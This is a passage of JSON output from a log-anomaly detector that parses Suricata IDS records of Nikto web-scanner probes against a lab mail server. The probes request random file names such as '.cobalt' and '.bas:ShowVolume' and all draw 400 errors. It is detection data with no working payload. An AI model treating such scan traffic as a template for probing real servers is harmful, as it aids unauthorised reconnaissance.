"/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.cobalt\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.cobalt", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.cobalt", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": 
",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46928,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46928, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":246780214773980,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", 
"/parser/model/flow_id/flow_id/flow_id": 246780214773980, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.330734+0000\",\"flow_id\":246780214773980,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46928,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cobalt\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cobalt\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.33 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.332241 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46930 -> 192.168.10.154:80", "/parser/model/time": 1583349514.332241, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", 
"/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46930, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.332241 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46930 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.33 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.nsfdeslo", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.332343+0000\",\"flow_id\":66060875861775,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46930,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nsfdeslo\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nsfdeslo\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", 
"/parser/model/time": 1583349514.332343, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":66060875861775,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46930,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nsfdeslo\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nsfdeslo\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46930,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nsfdeslo\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nsfdeslo\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.nsfdeslo\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", 
"/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.nsfdeslo\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.nsfdeslo", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.nsfdeslo", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", 
"/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46930,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46930, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", 
"/parser/model/flow_id/flow_id": "\"flow_id\":66060875861775,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 66060875861775, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.332343+0000\",\"flow_id\":66060875861775,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46930,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nsfdeslo\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nsfdeslo\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.33 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.333976 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46932 -> 192.168.10.154:80", "/parser/model/time": 1583349514.333976, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", 
"/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46932, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.333976 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46932 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.33 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.old", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.334225+0000\",\"flow_id\":1835810740114780,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46932,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.old\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.old\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.334225, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1835810740114780,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46932,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.old\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.old\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46932,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.old\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": 
"\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.old\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.old\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.old\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.old", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.old", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", 
"/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46932,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46932, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": 
"TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1835810740114780,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1835810740114780, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.334225+0000\",\"flow_id\":1835810740114780,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46932,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.old\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.old\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.33 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.336929 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 
192.168.10.238:46934 -> 192.168.10.154:80", "/parser/model/time": 1583349514.336929, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46934, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.336929 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46934 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.34 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.bas:ShowVolume", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": 
"{\"timestamp\":\"2020-03-04T19:18:34.337148+0000\",\"flow_id\":135802554818065,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46934,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.bas:ShowVolume\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.bas:ShowVolume\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.337148, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":135802554818065,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46934,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.bas:ShowVolume\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) 